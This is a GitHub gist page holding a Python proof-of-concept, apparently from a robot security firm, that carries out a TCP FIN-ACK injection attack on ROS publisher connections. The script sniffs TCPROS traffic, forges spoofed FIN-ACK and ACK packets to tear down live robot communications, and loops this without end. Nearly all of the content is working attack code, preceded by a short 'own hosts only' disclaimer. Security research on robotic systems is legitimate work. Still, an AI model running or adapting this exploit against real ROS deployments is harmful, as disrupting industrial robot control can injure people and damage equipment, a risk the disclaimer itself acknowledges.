Skip to content

Instantly share code, notes, and snippets.

@vmayoral
Created September 6, 2020 09:48
Show Gist options
  • Save vmayoral/829e84a245de214c01cbb5e74d29d15e to your computer and use it in GitHub Desktop.
Save vmayoral/829e84a245de214c01cbb5e74d29d15e to your computer and use it in GitHub Desktop.
FIN-ACK attack proof-of-concept for disrupting ROS and ROS-Industrial setups.
"""
FIN-ACK attack for ROS
DISCLAIMER: Use against your own hosts only! By no means Alias Robotics
or the authors of this exploit encourage or promote the unauthorized tampering
with running robotic systems. This can cause serious human harm and material
damages.
"""
from scapy.all import *
from robosploit.modules.generic.robotics.all import *
from robosploit.core.exploit import *
from robosploit.core.http.http_client import HTTPClient
from scapy.layers.inet import TCP
from scapy.layers.l2 import Ether
import sys
# bind layers so that packages are recognized as TCPROS
bind_layers(TCP, TCPROS)
def tcpros_fin_ack():
"""
crafting a FIN ACK interrupting publisher communications
"""
flag_valid = True
targetp = None
targetp_ack = None
# fetch 10 tcp packages
while flag_valid:
packages = sniff(iface="eth0", filter="tcp", count=4)
if len(packages[TCPROSBody]) < 1:
continue
else:
# find first TCPROSBody and pick a target
targetp = packages[TCPROSBody][-1] # pick latest instance
index = packages.index(packages[TCPROSBody][-1])
for i in range(index + 1, len(packages)):
targetp_ack = packages[i]
# check if the ack matches appropriately
if targetp[IP].src == targetp_ack[IP].dst and \
targetp[IP].dst == targetp_ack[IP].src and \
targetp[TCP].sport == targetp_ack[TCP].dport and \
targetp[TCP].dport == targetp_ack[TCP].sport and \
targetp[TCP].ack == targetp_ack[TCP].seq:
flag_valid = False
break
if not flag_valid and targetp_ack and targetp:
# Option 2
p_attack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
/TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="FA", seq=targetp_ack[TCP].ack,
ack=targetp_ack[TCP].seq)
ans = sr1(p_attack, retry=0, timeout=1)
if ans and len(ans) > 0 and ans[TCP].flags == "FA":
p_ack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
/TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="A", seq=ans[TCP].ack,
ack=ans[TCP].seq + 1)
send(p_ack)
while True:
tcpros_fin_ack()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment